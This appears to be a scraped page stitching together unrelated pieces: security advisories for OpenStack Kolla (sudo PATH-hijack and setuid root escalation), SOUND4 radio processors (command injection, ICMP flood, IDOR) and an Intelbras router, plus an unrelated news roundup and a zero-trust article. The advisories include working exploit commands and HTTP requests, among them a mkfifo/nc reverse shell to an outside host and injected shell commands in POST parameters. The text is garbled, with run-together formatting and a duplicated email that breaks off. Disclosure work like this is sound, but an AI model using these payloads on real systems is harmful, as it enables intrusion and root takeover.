A privilege escalation vulnerability exists in the sudo functionality of OpenStack Kolla git master 05194e7618. A misconfiguration in /etc/sudoers within a container can lead to increased privileges.

**SUMMARY**

A privilege escalation vulnerability exists in the sudo functionality of OpenStack Kolla git master 05194e7618. A misconfiguration in /etc/sudoers within a container can lead to increased privileges.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

OpenStack git master 05194e7618

**PRODUCT URLS**

OpenStack - https://opendev.org/openstack/

**CVSSv3 SCORE**

8.8 - CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

**CWE**

CWE-269 - Improper Privilege Management

**DETAILS**

OpenStack Kolla provides container images and deployment tools for running OpenStack clouds with best practice configurations.

Several Kolla containers have a sudoers policy to allow the application to run limited commands as root, which appears to be defined here:

    Matching Defaults entries for nova on <host>:
        setenv
    
    User nova may run the following commands on <host>:
        (root) NOPASSWD: /usr/local/bin/kolla_copy_cacerts
        (root) NOPASSWD: /usr/local/bin/kolla_set_configs
        ...
    

Of note is the Defaults: %kolla setenv line in /etc/sudoers. This allows users in the kolla group to modify environment variables, and there is no secure_path option that enforces a trusted PATH environment variable. Therefore, the unprivileged user (nova in this example) can change the PATH variable used by sudo, and run arbitrary commands as root when the Kolla scripts call external programs.

Specifically, there are two Kolla-provided scripts that are exploitable via this sudoers configuration.

The first script, kolla\_copy\_cacerts, calls out to the update-ca-certificates program, which is resolved from the PATH environment variable. This can be exploited by creating a script named “update-ca-certificates” in some writable location, and adding this location to the PATH before running sudo -E kolla_copy_cacerts.

The second script, kolla\_set\_configs, reads an environment variable for a JSON object or a path to a file containing a JSON object. This JSON specifies the source, destination, ownership and permissions for OpenStack configuration files to be copied. This can be exploited by exporting an environment variable that specifies a program to be copied with its SETUID bit set, and running kolla_set_configs with sudo -E as above.

Some containers (e.g. nova\_api) with this configuration are privileged, so in that case, root access inside the container may equate to root privilege on the container host itself.

**Exploit Proof of Concept****Method 1 (kolla_copy_cacerts)**

Observe current privilege level in container:

    $ id
    uid=42436(nova) gid=42436(nova) groups=42437(nova),42400(kolla),42427(qemu)
    

Create a script payload that will be executed as root:

    $ echo -e '#!/bin/sh\nexec bash -p' > /tmp/update-ca-certificates
    $ chmod 755 /tmp/update-ca-certificates
    

Update the shell’s PATH environment variable to include the directory that the payload is in, and run the affected script with sudo:

    $ PATH=/tmp:$PATH sudo -E /usr/local/bin/kolla_copy_cacerts
    # id
    uid=0(root) gid=0(root) groups=0(root)
    

**Method 2 (kolla_set_configs)**

Observe current privilege level in container:

    $ id
    uid=42436(nova) gid=42436(nova) groups=42437(nova),42400(kolla),42427(qemu)
    

Create a JSON object to be parsed by the script and export it to the appropriate environment variable:

    $ export KOLLA_CONFIG='{"command":"echo test", "config_files":[{"source":"/bin/bash", "dest":"/tmp/bash", "owner":"root", "perm":"0o6755"}]}'
    

Run the affected script with sudo and then execute the copied shell:

    $ sudo -E /usr/local/bin/kolla_set_configs
    $ /tmp/bash -p
    # id
    uid=0(root) gid=0(root) groups=0(root)
    

**Mitigation**

/etc/sudoers within the container should use the secure_path option to prevent the PATH environment variable from being modified; however this will not prevent other possibly dangerous environment variables from being changed. Ideally, the setenv option would be removed from /etc/sudoers altogether, and env_keep could be used for any safe environment variables that do not introduce security holes.

To avoid container compromises resulting in host compromise, avoid using privileged containers; prefer adding individual capabilities as needed.

**TIMELINE**

2022-08-11 - Vendor Disclosure  
2022-08-11 - Initial Vendor Contact  
2022-12-20 - Public Release

CVE-2022-38060: TALOS-2022-1589 || Cisco Talos Intelligence Group

Plus: An FBI platform got hacked, an ex-Twitter employee is sentenced for espionage, malicious Windows 10 installers circulate in Ukraine, and more.

As Russia's invasion of Ukraine drags on, navigation system monitors reported this week that they've detected a rise in GPS disruptions in Russian cities, ever since Ukraine began mounting long-range drone attacks. Elsewhere, a lawsuit against Meta alleges that a lack of adequate hate-speech moderation on Facebook led to violence that exacerbated Ethiopia's civil war. 

New evidence suggests that attackers planted data to frame an Indian priest who died in police custody—and that the hackers may have collaborated with law enforcement as he was investigated. The Russia-based ransomware gang Cuba abused legitimate Microsoft certificates to sign some of their malware, a method of falsely legitimatizing hacking tools that cybercriminals have particularly been relying on lately. And with the one-year anniversary of the Log4Shell vulnerability, researchers and security professionals reflected on the current state of open source supply-chain security, and what must be done to improve patch adoption.

We also explored the confluence of factors and circumstances leading to radicalization and extremism in the United States. And Meta gave WIRED some insight into the difficulty of enabling users to recover their accounts when they get locked out—without allowing attackers to exploit those same mechanisms for account takeovers.

But wait, there’s more! Each week, we highlight the security news we didn’t cover in depth ourselves. Click on the headlines below to read the full stories.

Alexey Brayman, 35, was one of seven people named in a 16-count federal indictment this week in which they were accused of operating an international smuggling ring over the past five years, illegally exported restricted technology to Russia. Brayman was taken into custody on Tuesday and later released on a $150,000 bond, after being ordered to forfeit his passport and abide by a curfew. He is an Israeli citizen who was born in Ukraine. Brayman and his wife, Daria, live in Merrimack, New Hampshire, a small town where the two ran an online craft business out of their home. “They are the nicest family,” a delivery driver who regularly drops off packages at their home told _The Boston Globe_. “They’ll leave gift cards out around the holidays. And snacks.” The indictment alleges, though, that their house was a staging site for “millions of dollars in military and sensitive dual-use technologies from US manufacturers and vendors.” Two other suspects connected to the case have also been arrested in New Jersey and Estonia.

A hacker breached the FBI information-sharing database InfraGard this week, compromising data from more than 80,000 members who share details and updates through the platform related to critical infrastructure in the United States. Some of the data is sensitive and pertains to national and digital security threats. Last weekend, the hacker posted samples of data stolen from the platform on a relatively new cybercriminal forum called Breached. They priced the database at $50,000 for the full contents. The hacker claims to have gained access to InfraGard by posing as the CEO of a finance company. The FBI said it was “aware of a potential false account associated with the InfraGard Portal and that it is actively looking into the matter.”

Former Twitter employee Ahmad Abouammo was convicted in August of being paid to send user data to the Saudi Arabian government while working at the tech company. He was also found guilty of money laundering, wire fraud, and falsification of records. He has now been sentenced to 42 months in prison. Abouammo worked at Twitter from 2013 to 2015. “This case revealed that foreign governments will bribe insiders to obtain the user information that is collected and stored by our Silicon Valley social-media companies,” US attorney Stephanie Hinds said in a statement. “This sentence sends a message to insiders with access to user information to safeguard it, particularly from repressive regimes, or risk significant time in prison.” Earlier this year, whistleblower and former Twitter security chief Peiter Zatko alleged that Twitter has long had problems with foreign agents infiltrating the company. The situation has been of particular concern as new CEO Elon Musk massively overhauls the company and its workforce.

In an effort to compromise Ukrainian government networks,  hackers have been posting malicious Windows 10 installers on torrent sites used in Ukraine and Russia, according to researchers from the security firm Mandiant. The installers were set up with the Ukrainian language pack and were free to download. They deployed malware for reconnaissance, data gathering, and exfiltration. Mandiant said it could not definitively attribute the campaign to specific hackers, but that the targets overlap with those that have been attacked in past hacks by the Russian military intelligence agency GRU.

Years after it was proved vulnerable and insecure, the US National Institute of Standards and Technology said on Thursday that the SHA-1 cryptographic algorithm should be removed from all software platforms by December 31, 2030. Developers should turn instead to algorithms with more robust security, namely SHA-2 and SHA-3. The “security hash algorithm,” or SHA, was developed by the National Security Agency and debuted in 1993. SHA-1 is a slightly modified replacement used since 1995. By 2005 it was clear that SHA-1 was “cryptographically broken,” but it remained in widespread use for years. NIST said this week, though, that attacks on SHA-1 “have become increasingly severe.” Developers have eight years to migrate away for any remaining uses of the algorithm. "Modules that still use SHA-1 after 2030 will not be permitted for purchase by the federal government,” NIST computer scientist Chris Celi said in a statement.

An Alleged Russian Smuggling Ring Was Uncovered in New Hampshire

Accelerating security challenges and the increasing footprint of edge and IoT devices call for zero-trust principles to drive cyber resiliency.

As businesses ramp up their adoption of edge and Internet of Things (IoT) infrastructure, security risks that already challenge IT organizations stand to become trickier than ever. The distributed nature of edge devices, the scale of IoT, and the limited compute capacity of devices at the edge heap on added difficulties to the increasingly shaky traditional security practices of yesteryear. In the era of edge, it simply won't be feasible anymore to cling to the castle-and-moat security tactics that practitioners have held on to for probably a decade too long as it was.  

Zero-trust principles are going to be key to meeting the security challenges of today and tomorrow — and fundamental to that will be architecting secure server hardware that stands at the bedrock of edge architecture.

**The Challenges Calling for Zero Trust**

Edge and IoT notwithstanding, security threats keep growing. Recent statistics show that global attack rates are up by 28% in the last year. Credential theft, account takeovers, lateral attacks, and DDoS attacks plague organizations of all sizes. And the costs of cybercrime keep ticking upward. Recent figures by the FBI's Internet Crime Complaint Center (IC3) found that cybercrime costs in the US topped $6.9 billion, up dramatically from $1.4 billion in 2017.

Throwing transformative technology architectures into this mix will only exacerbate matters if security isn't baked into the design. Without proper planning, securing assets and processes at the edge becomes more difficult to manage due to the rapidly proliferating pool of enterprise devices.

Market stats show that there are already more than 12.2 billion active IoT and edge endpoints worldwide, with expectations that by 2025 the figure will balloon to 27 billion. Organizations carry more risk because these devices are different than traditional on-premises IT devices. Devices at the edge — particularly IoT devices — frequently:

*   Process critical data away from data centers, with data including more private information
*   Are not supported or secured as strongly by many device manufacturers
*   Don't control passwords and authentication as strongly as traditional endpoints
*   Have limited compute capacity to implement security controls or updates
*   Are geographically distributed in nonsecured physical locations with no barbed wire, cameras, or barriers protecting them

All of this adds up to an enlarged attack surface that is extremely difficult to manage due to the sheer scale of devices out there. Policies and protocols are harder to implement and manage across the edge. Even something as "simple" as doing software updates can be a huge task. For example, often IoT firmware updates require manual or even physical intervention. If there are thousands or even tens of thousands of those devices run by an organization, this quickly becomes a quagmire for an IT team. Organizations need better methods for pushing out these updates, doing remote reboots, and performing malware remediation, not to mention monitoring and tracking the security status of all of these devices.

**More Than Authentication: The Promise of Zero Trust**

Zero trust is a set of guiding principles and an architectural approach to security that's well-suited to start addressing some of the edge security challenges outlined above. The heart of the zero-trust approach is in conditional access. The idea is that the right assets, accounts, and users are only granted access to the assets they need — when they're authorized, and when the situation is safely in line with the org's risk appetite. The architecture is designed to continually evaluate and validate all of the devices and behaviors in the IT environment before granting permissions and also periodically during use. It's great for the fluidity of the edge because it's not tied to the physical location of a device, network location, or asset ownership.

It's a sweeping approach, and one that can help reduce the risk surface at the edge when it is done right. Unfortunately, many organizations have taken a myopic view of zero trust, equating it solely as an authentication and authorization play. But there are a whole lot of other crucial elements to the architecture that enterprises need to get in place.

Arguably the most critical element of zero trust is the verification of assets before access is granted**.** While secure authentication and authorization is crucial, organizations also need mechanisms to ensure the security of the device that's connecting to sensitive assets and networks — including servers handling edge traffic. This includes verifying the status of the firmware in place, monitoring the integrity of the hardware, looking for evidence of compromised hardware, and more.

**Enabling Zero Trust With the Right Hardware**

While there is no such thing as zero-trust devices, organizations can set themselves up for zero-trust success by seeking out edge hardware that's more cyber resilient and enables easier verification of assets to stand up to the rigors of a strong zero-trust approach to security.

This means paying close attention to the way vendors architect their hardware. Ask questions to ensure they're paying more than just marketing lip service to the zero trust ideal. Do they follow a framework like the US Department of Defense's seven-pillar zero-trust standards? Looking for important controls for device trust, user trust, data trust, and software trust baked into the products that organizations choose to make up their edge architecture will in turn help them build zero trust into their own architecture.

Zero Trust in the Era of Edge

SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below suffer from a conditional command injection vulnerability in traceroute.php.

    SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (traceroute.php) Conditional Command InjectionVendor: SOUND4 Ltd.Product web page: https://www.sound4.com | https://www.sound4.bizAffected version: FM/HD Radio Processing:                  Impact/Pulse/First (Version 2: 1.1/2.15)                  Impact/Pulse/First (Version 1: 2.1/1.69)                  Impact/Pulse Eco 1.16                  Voice Processing:                  BigVoice4 1.2                  BigVoice2 1.30                  Web-Audio Streaming:                  Stream 1.1/2.4.29                  Watermarking:                  WM2 (Kantar Media) 1.11Summary: The SOUND4 IMPACT introduces an innovative process - mono andstereo parts of the signal are processed separately to obtain perfectconsistency in terms of both sound and level. Therefore, in movingreception, when the FM receiver switches from stereo to mono and back tostereo, the sound variations and changes in level are reduced by over 90%.In the SOUND4 IMPACT processing chain, the stereo expander can be usedsubstantially without any limitations.With its advanced functionalities and impressive versatility, SOUND4PULSE gives clients the ultimate price - performance ratio, providingmuch more than just a processor. Flexible and powerful, it ensures perfectsound quality and full compatibility with radio broadcasting standardsand can be used simultaneously for FM and HD, DAB, DRM or streaming.SOUND4 FIRST provides all the most important functionalities you needin an FM/HD processor and sets the bar high both in terms of performanceand affordability. Designed to deliver a sound of uncompromising quality,this tool gives you 2-band processing, a digital stereo generator and anIMPACT Clipper.Desc: This vulnerability allows a local authenticated user to create afile in the /tmp directory that contains malicious commands. The filemust have the filename ending with .traceroute.pid, and the commands inthe file can only be executed once by an external unauthenticated attacker.By calling the vulnerable script and making a single HTTP POST request,the attacker can gain command execution on the system. After the requestis made, the file containing the malicious commands will be deleted.-------------------------------------------------------------------------/var/www/traceroute.php:------------------------02:    if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST['traceroute_host']) && isset($_POST['networkid'])) {03:        $pidfilename="/tmp/" . $_POST['networkid'] . ".traceroute.pid";04:        if( file_exists($pidfilename)) {05:             $procid=file_get_contents($pidfilename);06:             shell_exec("pkill -P ".$procid);07:        }......29:            unlink($pidfilename);30:            exit();-------------------------------------------------------------------------Tested on: Apache/2.4.25 (Unix)           OpenSSL/1.0.2k           PHP/7.1.1           GNU/Linux 5.10.43 (armv7l)           GNU/Linux 4.9.228 (armv7l)Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2022-5740Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5740.php26.09.2022--#On the server> echo ";id>/var/www/b" > /tmp/251.traceroute.pid#External> curl -XPOST -sk https://RADIO/traceroute.php --data "traceroute_host=t00t&networkid=251"> curl -XPOST -sk https://RADIO/buid=33(www-data) gid=33(www-data) groups=29(audio),33(www-data)

SOUND4 IMPACT/FIRST/PULSE/Eco 2.x traceroute.php Conditional Command Injection

SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below allow an unauthenticated attacker to send network signals to an arbitrary target host that can be abused in an ICMP flooding attack. This includes the utilization of the ping, traceroute and nslookup commands through ping.php, traceroute.php and dns.php respectively.

    SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (ping/traceroute) ICMP Flood AttackVendor: SOUND4 Ltd.Product web page: https://www.sound4.com | https://www.sound4.bizAffected version: FM/HD Radio Processing:                  Impact/Pulse/First (Version 2: 1.1/2.15)                  Impact/Pulse/First (Version 1: 2.1/1.69)                  Impact/Pulse Eco 1.16                  Voice Processing:                  BigVoice4 1.2                  BigVoice2 1.30                  Web-Audio Streaming:                  Stream 1.1/2.4.29                  Watermarking:                  WM2 (Kantar Media) 1.11Summary: The SOUND4 IMPACT introduces an innovative process - mono andstereo parts of the signal are processed separately to obtain perfectconsistency in terms of both sound and level. Therefore, in movingreception, when the FM receiver switches from stereo to mono and back tostereo, the sound variations and changes in level are reduced by over 90%.In the SOUND4 IMPACT processing chain, the stereo expander can be usedsubstantially without any limitations.With its advanced functionalities and impressive versatility, SOUND4PULSE gives clients the ultimate price - performance ratio, providingmuch more than just a processor. Flexible and powerful, it ensures perfectsound quality and full compatibility with radio broadcasting standardsand can be used simultaneously for FM and HD, DAB, DRM or streaming.SOUND4 FIRST provides all the most important functionalities you needin an FM/HD processor and sets the bar high both in terms of performanceand affordability. Designed to deliver a sound of uncompromising quality,this tool gives you 2-band processing, a digital stereo generator and anIMPACT Clipper.Desc: The application allows an unauthenticated attacker to send networksignals to an arbitrary target host that can be abused in an ICMP floodingattack. This includes the utilisation of the ping, traceroute and nslookupcommands through ping.php, traceroute.php and dns.php respectively.Tested on: Apache/2.4.25 (Unix)           OpenSSL/1.0.2k           PHP/7.1.1           GNU/Linux 5.10.43 (armv7l)           GNU/Linux 4.9.228 (armv7l)Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2022-5728Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5728.php26.09.2022--> curl -XPOST -sk https://RADIO/ping.php --data "ping_host=localhost&networkid=251" # ping -c 3 -W 5 %s> curl -XPOST -sk https://RADIO/traceroute.php --data "traceroute_host=localhost&networkid=251"> curl -XPOST -sk https://RADIO/dns.php --data "dns_host=localhost&networkid=251"

SOUND4 IMPACT/FIRST/PULSE/Eco 2.x ICMP Flood Attack

SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below suffer from an authorization bypass due to an insecure direct object reference vulnerability.

  
SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x Authorization Bypass (IDOR)

Vendor: SOUND4 Ltd.  
Product web page: https://www.sound4.com | https://www.sound4.biz  
Affected version: FM/HD Radio Processing:  
                  Impact/Pulse/First (Version 2: 1.1/2.15)  
                  Impact/Pulse/First (Version 1: 2.1/1.69)  
                  Impact/Pulse Eco 1.16  
                  Voice Processing:  
                  BigVoice4 1.2  
                  BigVoice2 1.30  
                  Web-Audio Streaming:  
                  Stream 1.1/2.4.29  
                  Watermarking:  
                  WM2 (Kantar Media) 1.11

Summary: The SOUND4 IMPACT introduces an innovative process - mono and  
stereo parts of the signal are processed separately to obtain perfect  
consistency in terms of both sound and level. Therefore, in moving  
reception, when the FM receiver switches from stereo to mono and back to  
stereo, the sound variations and changes in level are reduced by over 90%.  
In the SOUND4 IMPACT processing chain, the stereo expander can be used  
substantially without any limitations.

With its advanced functionalities and impressive versatility, SOUND4  
PULSE gives clients the ultimate price - performance ratio, providing  
much more than just a processor. Flexible and powerful, it ensures perfect  
sound quality and full compatibility with radio broadcasting standards  
and can be used simultaneously for FM and HD, DAB, DRM or streaming.

SOUND4 FIRST provides all the most important functionalities you need  
in an FM/HD processor and sets the bar high both in terms of performance  
and affordability. Designed to deliver a sound of uncompromising quality,  
this tool gives you 2-band processing, a digital stereo generator and an  
IMPACT Clipper.

Desc: The application is vulnerable to insecure direct object references  
that occur when the application provides direct access to objects based  
on user-supplied input. As a result of this vulnerability attackers can  
bypass authorization and access the hidden resources on the system and  
execute privileged functionalities.

Tested on: Apache/2.4.25 (Unix)  
           OpenSSL/1.0.2k  
           PHP/7.1.1  
           GNU/Linux 5.10.43 (armv7l)  
           GNU/Linux 4.9.228 (armv7l)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
Macedonian Information Security Research and Development Laboratory  
Zero Science Lab - https://www.zeroscience.mk - @zeroscience

Advisory ID: ZSL-2022-5723  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5723.php

26.09.2022

--

(GET|POST) /** HTTP/1.1

/var/www/:  
----------

.SOUND4  
about.php  
actioninprogress.php  
broken_error.php  
cfg_filewatch.xml  
cfg_filewatch_specific.xml  
checklogin.php  
checkserver.php  
config.php  
datahandlerdlg.php  
descrxml.php  
dns.php  
downloads  
downloads.php  
fullrebootsystem.php  
global.php  
globaljs.php  
guifactorysettings.xml  
guixml.php  
guixml_error.php  
header.php  
images  
index.php  
isreboot.php  
jquery-3.2.1.min.js  
jquery-plugins  
jquery-ui-custom  
jquery-ui-i18n.js  
jquery-ui.css  
jquery-ui.js  
jquery.js  
jquery.ui.touch-punch.min.js  
killffmpeg.php  
linkandshare.php  
login.php  
logout.php  
monitor.php  
networkdiagnostic.php  
partialrebootsystem.php  
ping.php  
playercfg.xml  
rebootsystem.php  
restoreinprogress.php  
script.min.js  
secure.php  
serverinprogress.php  
settings.php  
setup.php  
setup_ethernet.php  
style.min.css  
traceroute.php  
upgrade  
upgrade.php  
upgradeinprogress.php  
uploaded_guicustomload.php  
uploaded_kantarlic.php  
uploaded_licfile.php  
uploaded_logo.php  
uploaded_presetfile.php  
uploaded_restorefile.php  
uploaded_upgfile.php  
validate_tz.php  
ws.min.js  
ws.php  
wsjquery-class.min.js  
www-data-handler.php

/usr/cgi-bin/:  
--------------

(GET|POST) /** HTTP/1.1

backup.cgi  
cgi-form-data  
downloadkantarlic.cgi  
ffmpeg.cgi  
frontpanel  
getlogs.cgi  
getlogszip.cgi  
guicustomsettings.cgi  
guicustomsettingsload.cgi  
guifactorysettings.cgi  
importpreset.cgi  
loghandler.php  
logo  
logoremove.cgi  
logoupload.cgi  
phptail.php  
printenv  
printenv.vbs  
printenv.wsf  
restore.cgi  
restorefactory.cgi  
test-cgi  
upgrade.cgi  
upload.cgi

SOUND4 IMPACT/FIRST/PULSE/Eco 2.x Authorization Bypass

Intelbras WiFiber 120AC inMesh version 1.1-220216 suffers from an authenticated command injection vulnerability.

    CyberDanube Security Research 20221009-0-------------------------------------------------------------------------------                 title| Authenticated Command Injection              product| Intelbras WiFiber 120AC inMesh   vulnerable version| 1.1-220216        fixed version| 1-1-220826           CVE number| CVE-2022-40005               impact| High             homepage| https://www.intelbras.com                found| 2022-08-01                   by| T. Weber (Office Vienna)                     | CyberDanube Security Research                     | Vienna | St. Pölten                     |                     | https://www.cyberdanube.com------------------------------------------------------------------------------- Vendor description------------------------------------------------------------------------------- "We are Intelbras. A company that for 45 years has been offering innovativesolutions in security, networks, communication and energy. Our dream began tocome to life there in 1976, in the city of São José, having originated from anINspiration and a promising idea: to manufacture PABX centrals. During the80's, we surprised the market with the launch of the first PABX developed withnational technology, a product that showed everyone our innovative DNA. The 90swere marked by the consolidation of the company in the telecommunicationssegment and we became leaders in the PABX and telephone terminals segment. Theturn of the millennium represented the search for greater connection andproximity to people, something that is in total harmony with our philosophy tothis day. More consolidated in the market, in 2010 we opened 3 manufacturingunits, located in Santa Rita do Sapucaí/MG, Manaus/AM and São José/SC.We reached our 45th birthday having reached a historic milestone: we have beena company listed on the B3 since February 2021. Our trajectory so far has beenINnovative, INtelligent and INSpiring. We saw innovation, which is part of ourDNA, increasingly present in our daily lives. And it was only possible towrite a story so full of achievements because employees, partners and customerswere close and believed in us."Source: https://www.intelbras.com/en/institutional/who-we-areVulnerable versions------------------------------------------------------------------------------- WiFiber 120AC inMesh / 1.1-220216Vulnerability overview------------------------------------------------------------------------------- 1) Authenticated Command Injection (CVE-2022-40005)The web server of the device is prone to an authenticated command injection.It allows an attacker to gain full access to the underlying operating system ofthe device with all implications. If such a device is acting as key device inan industrial network, more extensive damage in the corresponding network canbe done by an attacker.Proof of Concept------------------------------------------------------------------------------- 1) Authenticated Command Injection (CVE-2022-40005)The web server is prone to an authenticated command injection via POSTparameters. The following proof-of-concept shows how to inject the command"ls /" to the system which gets executed in the background:=============================================================================== POST /boaform/formPing6 HTTP/1.1Host: 192.168.3.147User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 87Origin: http://192.168.3.147Connection: closeReferer: http://192.168.3.147/ping6.aspUpgrade-Insecure-Requests: 1pingAddr=%3Bls+%2F%3B&wanif=65535&go=+Ir&submit-url=%2Fping6.asp&postSecurityFlag=39908 =============================================================================== The following commands can be used to open a reverse shell:"rm -f /tmp/f""mkfifo /tmp/f""cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.3.138 8889 >/tmp/f"Those commands were sent via a crafted POST request:=============================================================================== POST /boaform/formTracert HTTP/1.1Host: 192.168.3.147User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 255Origin: http://192.168.3.147Connection: closeReferer: http://192.168.3.147/tracert.aspUpgrade-Insecure-Requests: 1proto=0&traceAddr=%3Brm+-f+%2Ftmp%2Ff%3Bmkfifo+%2Ftmp%2Ff%3Bcat+%2Ftmp%2Ff%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+192.168.3.138+8889+%3E%2Ftmp%2Ff%3B&trys=3&timeout=5&datasize=56&dscp=0&maxhop=30&wanif=65535&go=+Ir&submit-url=%2Ftracert.asp&postSecurityFlag=29290 =============================================================================== The vulnerability was manually verified on an emulated device by using theMEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).Solution------------------------------------------------------------------------------- Update to firmware version 1-1-220826.https://backend.intelbras.com/sites/default/files/2022-08/ONT_Wifiber_120_AC_Vers%C3%A3o_1-1-220826.zip Workaround------------------------------------------------------------------------------- NoneRecommendation------------------------------------------------------------------------------- CyberDanube recommends Intelbras customers to upgrade the firmware to thelatest version available.Contact Timeline------------------------------------------------------------------------------- 2022-08-02: Contacting Intelbras via suporte@intelbras.com.br.2022-08-03: Request from Intelbras to send the advisory tocsirt@intelbras.com.br; Sent the advisory to this address.2022-08-30: Asked for status update; Vendor answered that the new firmware             version has been released the day before. Set the disclosure date             to 2022-10-03 (60 days policy).2022-10-03: Shifted disclosure date to 2022-10-09 due to sick colleagues.2022-10-09: Coordinated disclosure of advisory.Web: https://www.cyberdanube.comTwitter: https://twitter.com/cyberdanubeMail: research at cyberdanube dot comEOF T. Weber / @2022On 09.10.22 17:21, Thomas Weber wrote:> CyberDanube Security Research 20221009-0> ------------------------------------------------------------------------------- >>                title| Authenticated Command Injection>              product| Intelbras WiFiber 120AC inMesh>   vulnerable version| 1.1-220216>        fixed version| 1-1-220826>           CVE number|>               impact| High>             homepage| https://www.intelbras.com>                found| 2022-08-01>                   by| T. Weber (Office Vienna)>                     | CyberDanube Security Research>                     | Vienna | St. Pölten>                     |>                     | https://www.cyberdanube.com> ------------------------------------------------------------------------------- >>> Vendor description> ------------------------------------------------------------------------------- >> "We are Intelbras. A company that for 45 years has been offering > innovative> solutions in security, networks, communication and energy. Our dream > began to> come to life there in 1976, in the city of São José, having originated > from an> INspiration and a promising idea: to manufacture PABX centrals. During > the> 80's, we surprised the market with the launch of the first PABX > developed with> national technology, a product that showed everyone our innovative > DNA. The 90s> were marked by the consolidation of the company in the telecommunications> segment and we became leaders in the PABX and telephone terminals > segment. The> turn of the millennium represented the search for greater connection and> proximity to people, something that is in total harmony with our > philosophy to> this day. More consolidated in the market, in 2010 we opened 3 > manufacturing> units, located in Santa Rita do Sapucaí/MG, Manaus/AM and São José/SC.> We reached our 45th birthday having reached a historic milestone: we > have been> a company listed on the B3 since February 2021. Our trajectory so far > has been> INnovative, INtelligent and INSpiring. We saw innovation, which is > part of our> DNA, increasingly present in our daily lives. And it was only possible to> write a story so full of achievements because employees, partners and > customers> were close and believed in us.">> Source: https://www.intelbras.com/en/institutional/who-we-are>>> Vulnerable versions> ------------------------------------------------------------------------------- >> WiFiber 120AC inMesh / 1.1-220216>>> Vulnerability overview> ------------------------------------------------------------------------------- >> 1) Authenticated Command Injection> The web server of the device is prone to an authenticated command > injection.> It allows an attacker to gain full access to the underlying operating > system of> the device with all implications. If such a device is acting as key > device in> an industrial network, more extensive damage in the corresponding > network can> be done by an attacker.>>> Proof of Concept> ------------------------------------------------------------------------------- >> 1) Authenticated Command Injection> The web server is prone to an authenticated command injection via POST> parameters. The following proof-of-concept shows how to inject the > command> "ls /" to the system which gets executed in the background:>> =============================================================================== >> POST /boaform/formPing6 HTTP/1.1> Host: 192.168.3.147> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 > Firefox/91.0> Accept: > text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8> Accept-Language: de,en-US;q=0.7,en;q=0.3> Accept-Encoding: gzip, deflate> Content-Type: application/x-www-form-urlencoded> Content-Length: 87> Origin: http://192.168.3.147> Connection: close> Referer: http://192.168.3.147/ping6.asp> Upgrade-Insecure-Requests: 1>> pingAddr=%3Bls+%2F%3B&wanif=65535&go=+Ir&submit-url=%2Fping6.asp&postSecurityFlag=39908 >> =============================================================================== >>> The following commands can be used to open a reverse shell:>> "rm -f /tmp/f"> "mkfifo /tmp/f"> "cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.3.138 8889 >/tmp/f">> Those commands were sent via a crafted POST request:>> =============================================================================== >> POST /boaform/formTracert HTTP/1.1> Host: 192.168.3.147> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 > Firefox/91.0> Accept: > text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8> Accept-Language: de,en-US;q=0.7,en;q=0.3> Accept-Encoding: gzip, deflate> Content-Type: application/x-www-form-urlencoded> Content-Length: 255> Origin: http://192.168.3.147> Connection: close> Referer: http://192.168.3.147/tracert.asp> Upgrade-Insecure-Requests: 1>> proto=0&traceAddr=%3Brm+-f+%2Ftmp%2Ff%3Bmkfifo+%2Ftmp%2Ff%3Bcat+%2Ftmp%2Ff%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+192.168.3.138+8889+%3E%2Ftmp%2Ff%3B&trys=3&timeout=5&datasize=56&dscp=0&maxhop=30&wanif=65535&go=+Ir&submit-url=%2Ftracert.asp&postSecurityFlag=29290 >> =============================================================================== >>> The vulnerability was manually verified on an emulated device by using > the> MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).>>> Solution> ------------------------------------------------------------------------------- >> Update to firmware version 1-1-220826.>> https://backend.intelbras.com/sites/default/files/2022-08/ONT_Wifiber_120_AC_Vers%C3%A3o_1-1-220826.zip >>>> Workaround> ------------------------------------------------------------------------------- >> None>>> Recommendation> ------------------------------------------------------------------------------- >> CyberDanube recommends Intelbras customers to upgrade the firmware to the> latest version available.>>> Contact Timeline> ------------------------------------------------------------------------------- >> 2022-08-02: Contacting Intelbras via suporte@intelbras.com.br.> 2022-08-03: Request from Intelbras to send the advisory to> csirt@intelbras.com.br; 